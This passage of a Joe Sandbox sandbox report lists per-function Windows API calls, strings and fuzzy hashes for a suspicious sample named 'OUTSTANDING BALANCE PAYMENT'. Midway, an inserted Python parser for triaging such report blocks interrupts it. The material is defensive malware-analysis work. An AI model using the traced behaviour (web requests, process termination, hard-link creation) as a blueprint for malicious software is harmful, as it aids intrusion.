                                                                    • Part of subcall function 002A123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 002A7F65
                                                                    • Part of subcall function 002A123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 002A7F78
                                                                    • Part of subcall function 002A123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 002A7F8B
                                                                    • Part of subcall function 002A123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 002A7F9E
                                                                    • Part of subcall function 002A123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 002A7FB1
                                                                    • Part of subcall function 002A123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 002A7FC4
                                                                    • Part of subcall function 002A123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 002A7FD7
                                                                    • Part of subcall function 002A123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 002A7FEA
                                                                    • Part of subcall function 002A123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 002A7FFD
                                                                    • Part of subcall function 002A123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 002A8010
                                                                    • Part of subcall function 002A123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 002A8023
                                                                    • Part of subcall function 002A123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 002A8036
                                                                    • Part of subcall function 002A123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 002A8049
                                                                    • Part of subcall function 002A123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 002A805C
                                                                    • Part of subcall function 002A123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 002A806F
                                                                  • __mtinitlocks.LIBCMT ref: 002A7B4C
                                                                    • Part of subcall function 002A7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0033AC68,00000FA0,?,?,002A7B51,002A5E77,00336C70,00000014), ref: 002A7E41
                                                                  • __mtterm.LIBCMT ref: 002A7B55
                                                                    • Part of subcall function 002A7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,002A7B5A,002A5E77,00336C70,00000014), ref: 002A7D3F
                                                                    • Part of subcall function 002A7BBD: _free.LIBCMT ref: 002A7D46
                                                                    • Part of subcall function 002A7BBD: DeleteCriticalSection.KERNEL32(0033AC68,?,?,002A7B5A,002A5E77,00336C70,00000014), ref: 002A7D68
                                                                  • __calloc_crt.LIBCMT ref: 002A7B7A
                                                                  • GetCurrentThreadId.KERNEL32 ref: 002A7BA3
                                                                  Similarity
                                                                  • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                  • String ID:
                                                                  • API String ID: 2942034483-0
                                                                  APIs
                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0028281D
                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00282825
                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00282830
                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0028283B
                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00282843
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0028284B
                                                                  Similarity
                                                                  • API ID: Virtual
                                                                  • String ID:
                                                                  • API String ID: 4278518827-0
                                                                  Similarity
                                                                  • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                  • String ID:
                                                                  • API String ID: 1423608774-0
                                                                  APIs
                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 002C7C07
                                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 002C7C1D
                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 002C7C2C
                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002C7C3B
                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002C7C45
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002C7C4C
                                                                  Similarity
                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                  • String ID:
                                                                  • API String ID: 839392675-0
                                                                  APIs
                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 002C9A33
                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,002F5DEE,?,?,?,?,?,0028ED63), ref: 002C9A44
                                                                  • TerminateThread.KERNEL32(?,000001F6,?,?,?,002F5DEE,?,?,?,?,?,0028ED63), ref: 002C9A51
                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,002F5DEE,?,?,?,?,?,0028ED63), ref: 002C9A5E
                                                                    • Part of subcall function 002C93D1: CloseHandle.KERNEL32(?,?,002C9A6B,?,?,?,002F5DEE,?,?,?,?,?,0028ED63), ref: 002C93DB
                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 002C9A71
                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,002F5DEE,?,?,?,?,?,0028ED63), ref: 002C9A78
                                                                  Similarity
                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                  • String ID:
                                                                  • API String ID: 3495660284-0
                                                                  • Opcode ID: f4fe9e6dbcc48c4742fca3c86a8b9f90afcecf9745d1c31196a4ae89b9e81d43
                                                                  • Instruction ID: eb4e5d8ed94720507570da8240946ca949564aab9bb41475c6c369e44beec700
                                                                  • Opcode Fuzzy Hash: f4fe9e6dbcc48c4742fca3c86a8b9f90afcecf9745d1c31196a4ae89b9e81d43
                                                                  • Instruction Fuzzy Hash: 6EF05E32142212ABD7121BE4EC9DEAA77ADFF88301F140926F603914A4DB759951DB50
                                                                  APIs
                                                                    • Part of subcall function 0029F4EA: std::exception::exception.LIBCMT ref: 0029F51E
                                                                    • Part of subcall function 0029F4EA: __CxxThrowException@8.LIBCMT ref: 0029F533
                                                                  • __swprintf.LIBCMT ref: 00281EA6
                                                                  Strings
                                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00281D49
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                   • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                  • API String ID: 2125237772-557222456
                                                                  • Opcode ID: bd6156c028cb7d74f44a326857a949f0ca5eec7b007d6f07b8310522d85902d7
                                                                  • Instruction ID: 2e8c1906706a3ad8c991d187ac891fcfb90170f2de4f46a9a4a8d1e3209ad5df
                                                                  • Opcode Fuzzy Hash: bd6156c028cb7d74f44a326857a949f0ca5eec7b007d6f07b8310522d85902d7
                                                                  • Instruction Fuzzy Hash: 0991BA791252069FC724FF24C986C7AB7A8AF85740F10092DF986972E1DB70ED25CB92
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 002DB006
                                                                  • CharUpperBuffW.USER32(?,?), ref: 002DB115
                                                                  • VariantClear.OLEAUT32(?), ref: 002DB298
                                                                    • Part of subcall function 002C9DC5: VariantInit.OLEAUT32(00000000), ref: 002C9E05
                                                                    • Part of subcall function 002C9DC5: VariantCopy.OLEAUT32(?,?), ref: 002C9E0E
                                                                    • Part of subcall function 002C9DC5: VariantClear.OLEAUT32(?), ref: 002C9E1A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                   • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                  • API String ID: 4237274167-1221869570
                                                                  • Opcode ID: 19baa5d932b6375d6d0506ed9b9ac865b83e135d912d1aa30d11bff3ca0b7023
                                                                  • Instruction ID: 7ab130f147b1a2d5639e73e42130e79cce63d6e38d6b923dd72c2e8436ee9924
                                                                  • Opcode Fuzzy Hash: 19baa5d932b6375d6d0506ed9b9ac865b83e135d912d1aa30d11bff3ca0b7023
                                                                  • Instruction Fuzzy Hash: 3E919C35618302DFCB11EF24C49595AB7E4AF88704F14886EF89A8B3A2DB31ED55CB52
                                                                  APIs
                                                                    • Part of subcall function 0029C6F4: _wcscpy.LIBCMT ref: 0029C717
                                                                  • _memset.LIBCMT ref: 002C5438
                                                                  • GetMenuItemInfoW.USER32(?), ref: 002C5467
                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002C5513
                                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 002C553D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                   • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                  • String ID: 0
                                                                  • API String ID: 4152858687-4108050209
                                                                  • Opcode ID: dc51790f350a3c56b3591d122bade98695fa848888a64258f88bf0776cd2534f
                                                                  • Instruction ID: 39cc536787ceeacbfef481748c9fa9214af2c8e7182fe15f6f43377538f2da98
                                                                  • Opcode Fuzzy Hash: dc51790f350a3c56b3591d122bade98695fa848888a64258f88bf0776cd2534f
                                                                  • Instruction Fuzzy Hash: CF510231534B629BD715AF28C840F6BB7E8AF953A0F44072DF895D3190DBA0EDE08B52
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 002C027B
                                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 002C02B1
                                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 002C02C2
                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 002C0344
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                   • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                                  • String ID: DllGetClassObject
                                                                  • API String ID: 753597075-1075368562
                                                                  • Opcode ID: 87ad1b6912f75f84f726a39676adb1d4e3cb006d6edfc9a5c6ec7c2bcf1b3cfb
                                                                  • Instruction ID: 347e1d6444a5ae627287aa8b877b882664994d00699be523d307111e9b47e299
                                                                  • Opcode Fuzzy Hash: 87ad1b6912f75f84f726a39676adb1d4e3cb006d6edfc9a5c6ec7c2bcf1b3cfb
                                                                  • Instruction Fuzzy Hash: D44179B1614204EFDB05CF54C8D4F9ABBB9EF84310F1482AEE9099F206D7B1DA50CBA0
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 002C5075
                                                                  • GetMenuItemInfoW.USER32 ref: 002C5091
                                                                  • DeleteMenu.USER32(00000004,00000007,00000000), ref: 002C50D7
                                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00341708,00000000), ref: 002C5120
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                   • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Delete$InfoItem_memset
                                                                  • String ID: 0
                                                                  • API String ID: 1173514356-4108050209
                                                                  • Opcode ID: 4f874786ff7ab90a22e374654692e54512c111002b10360fbf254bf40cb0c035
                                                                  • Instruction ID: 5c0d60a017465df3286c4a0ec5705396674de163fc643f0454636827b04376b5
                                                                  • Opcode Fuzzy Hash: 4f874786ff7ab90a22e374654692e54512c111002b10360fbf254bf40cb0c035
                                                                  • Instruction Fuzzy Hash: B141C0312157129FD720DF24DC88F6ABBE8AF89324F08471EF85997291D770E960CB62
                                                                  APIs
                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 002CE742
                                                                  • GetLastError.KERNEL32(?,00000000), ref: 002CE768
                                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 002CE78D
                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 002CE7B9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                   • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                                  • String ID: p1#v`K$v
                                                                  • API String ID: 3321077145-1068180069
                                                                  • Opcode ID: e7755fff86e31ffa92153e8e80559887d1ef3bcc0a99e9ae9867349d59d7b21b
                                                                  • Instruction ID: 614d39b820aa5ca7153bdefaba678986e8801cea982e8a7be8aeb88305f1fcb2
                                                                  • Opcode Fuzzy Hash: e7755fff86e31ffa92153e8e80559887d1ef3bcc0a99e9ae9867349d59d7b21b
                                                                  • Instruction Fuzzy Hash: 2C413239210611DFCF12AF14C845A5DBBE5BF89720F098489E906AB3A2CB30FD64DF81
                                                                  APIs
                                                                  • CharLowerBuffW.USER32(?,?,?,?), ref: 002E0587
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                   • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharLower
                                                                  • String ID: cdecl$none$stdcall$winapi
                                                                  • API String ID: 2358735015-567219261
                                                                  • Opcode ID: 3c26dfe3f424e7630b0f275310570fd0fab7c167c9579fbbb82e1c7670a5efc1
                                                                  • Instruction ID: 992d2e999b67fbec4df533087e4f811326da970eba4d679c3506b90b17dd342e
                                                                  • Opcode Fuzzy Hash: 3c26dfe3f424e7630b0f275310570fd0fab7c167c9579fbbb82e1c7670a5efc1
                                                                  • Instruction Fuzzy Hash: 0E31E334520246ABCF00EF55C881AAEB3B8FF44314B50462AE426A77D1DBB1E966CF50
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 002BB88E
                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 002BB8A1
                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 002BB8D1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                   • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 3850602802-1403004172
                                                                  • Opcode ID: cef56097933a289031fff0c18985257b53e40d8734b29bbc110aebc32b38b86f
                                                                  • Instruction ID: 5ed129bac62d8cbd1935cbc6097043f2db9c7ab37ba6a50f6774a2afdca8deec
                                                                  • Opcode Fuzzy Hash: cef56097933a289031fff0c18985257b53e40d8734b29bbc110aebc32b38b86f
                                                                  • Instruction Fuzzy Hash: 9D21E179921108AFDB19AFA4D88A9FF77BCDF05394F504129F021A21E1DBB44D269B60
                                                                  APIs
                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 002D4401
                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002D4427
                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 002D4457
                                                                  • InternetCloseHandle.WININET(00000000), ref: 002D449E
                                                                    • Part of subcall function 002D5052: GetLastError.KERNEL32(?,?,002D43CC,00000000,00000000,00000001), ref: 002D5067
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                   • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                  • String ID:
                                                                  • API String ID: 1951874230-3916222277
                                                                  • Opcode ID: d7171411762e8fcabf58c5c496859c3d8884f74697ac81351b3c31e4821c7b90
                                                                  • Instruction ID: 2c06a3675c7bbd3dcc8b16a442e29050c31c26b6926f54c3502450e521e09052
                                                                  • Opcode Fuzzy Hash: d7171411762e8fcabf58c5c496859c3d8884f74697ac81351b3c31e4821c7b90
                                                                  • Instruction Fuzzy Hash: 2D219FB2510208BFE712AF94CC85EBFB6ECFB48B58F10801BF109E2240EA748D559B71
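The function blocks on this page, as an added example that is not part of the Joe Sandbox report nor of the AutoIt runtime it describes: a small Python parser that turns each "APIs / Strings / Memory Dump Source / Similarity" block into a record, so call arguments, "Part of subcall" relations, Opcode and Instruction fuzzy hashes and API String IDs can be filtered and compared across samples instead of being read by hand. The embedded sample is constructed from two entries on this page (the WinINet block that ends at InternetCloseHandle, and the __swprintf block with its printf-format regex string), trimmed, with one "Associated" line kept to show the stray "Download File" link text being stripped. The WATCHLIST set, the section names used as delimiters and the assumption that every block opens with an "APIs" header are mine, not the report's. Parsing the arguments makes details such as the second argument of HttpQueryInfoW (00000005, which is HTTP_QUERY_CONTENT_LENGTH) directly queryable.

```python
"""Parse the per-function "APIs / Strings / Memory Dump Source / Similarity" blocks that
Joe Sandbox's IDA plugin emits (layout as seen on this report) into records and run a few
triage checks. Added example, not Joe Sandbox code; it assumes the page's text layout
once leading whitespace is stripped and that every block opens with an "APIs" line."""
import re
from dataclasses import dataclass, field

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "• Name.MODULE(args), ref: ADDR", optionally prefixed by "Part of subcall function ADDR:";
# the argument list and the comma before "ref" are both optional in the report.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[\w@:]+)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$"
)
STR_RE = re.compile(r"^•\s*(?P<s>.*), xrefs: (?P<ref>[0-9A-Fa-f]{8})$")
KV_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
# Hypothetical triage watch-list (assumption): APIs whose callers you want listed.
WATCHLIST = {"InternetOpenUrlW.WININET", "HttpSendRequestW.WININET", "CreateHardLinkW.KERNEL32"}


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)      # dicts: name, module, args, ref, subcall
    strings: list = field(default_factory=list)   # (string, xref address)
    meta: dict = field(default_factory=dict)      # Source File, API ID, Opcode ID, ...
    associated: list = field(default_factory=list)


def parse_entries(text):
    """One FunctionEntry per "APIs" block; the section header selects the line grammar."""
    entries, section, cur = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":                        # every function block opens with this
            cur = FunctionEntry()
            entries.append(cur)
            section = line
        elif line in SECTIONS:
            section = line
        elif cur is None:
            continue                              # text before the first block
        elif section == "APIs":
            m = API_RE.match(line)
            if m:
                args = [a for a in (m["args"] or "").split(",") if a]
                cur.apis.append({"name": m["name"], "module": m["module"], "args": args,
                                 "ref": m["ref"], "subcall": m["sub"]})
        elif section == "Strings":
            m = STR_RE.match(line)
            if m:
                cur.strings.append((m["s"], m["ref"]))
        else:
            m = KV_RE.match(line)
            if m:   # "Download File" is link text the HTML export leaves on "Associated" lines
                val = m["val"].removesuffix("Download File").strip()
                if m["key"] == "Associated":
                    cur.associated.append(val)
                else:
                    cur.meta[m["key"]] = val
    return entries


def api_names(entry, include_subcalls=True):
    """'Name.MODULE' per call; "Part of subcall" lines are calls made by callees."""
    return {f"{a['name']}.{a['module']}" for a in entry.apis
            if include_subcalls or a["subcall"] is None}


def entries_calling(entries, watchlist):
    """(index, matched APIs) for every function that touches a watch-listed API."""
    return [(i, sorted(api_names(e) & set(watchlist)))
            for i, e in enumerate(entries) if api_names(e) & set(watchlist)]


def hashes_consistent(entry):
    """On this report "Opcode ID" and "Opcode Fuzzy Hash" carry the same value; a missing
    or differing value means the block was truncated or mis-parsed when copied."""
    return "Opcode ID" in entry.meta and entry.meta["Opcode ID"] == entry.meta.get("Opcode Fuzzy Hash")


# Constructed sample: two entries copied from this report, with the dump lines trimmed.
SAMPLE = r"""
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 002D4401
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002D4427
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 002D4457
• InternetCloseHandle.WININET(00000000), ref: 002D449E
  • Part of subcall function 002D5052: GetLastError.KERNEL32(?,?,002D43CC,00000000,00000000,00000001), ref: 002D5067
Strings
Memory Dump Source
• Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• String ID:
• API String ID: 1951874230-3916222277
• Opcode ID: d7171411762e8fcabf58c5c496859c3d8884f74697ac81351b3c31e4821c7b90
• Opcode Fuzzy Hash: d7171411762e8fcabf58c5c496859c3d8884f74697ac81351b3c31e4821c7b90
APIs
  • Part of subcall function 0029F4EA: __CxxThrowException@8.LIBCMT ref: 0029F533
• __swprintf.LIBCMT ref: 00281EA6
Strings
• \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00281D49
"""
```

`parse_entries` takes the report text as copied, so it can be pointed at the whole page; `entries_calling` then answers "which functions reach WinINet or CreateHardLinkW" in one pass, and `hashes_consistent` flags blocks whose duplicated Opcode hash is missing, which is how a truncated copy-paste shows up (the second sample entry is deliberately cut short to trigger it).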
                                                                  APIs
                                                                    • Part of subcall function 0029D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0029D1BA
                                                                    • Part of subcall function 0029D17C: GetStockObject.GDI32(00000011), ref: 0029D1CE
                                                                    • Part of subcall function 0029D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0029D1D8
                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 002E915C
                                                                  • LoadLibraryW.KERNEL32(?), ref: 002E9163
                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 002E9178
                                                                  • DestroyWindow.USER32(?), ref: 002E9180
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                   • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                  • String ID: SysAnimate32
                                                                  • API String ID: 4146253029-1011021900
                                                                  APIs
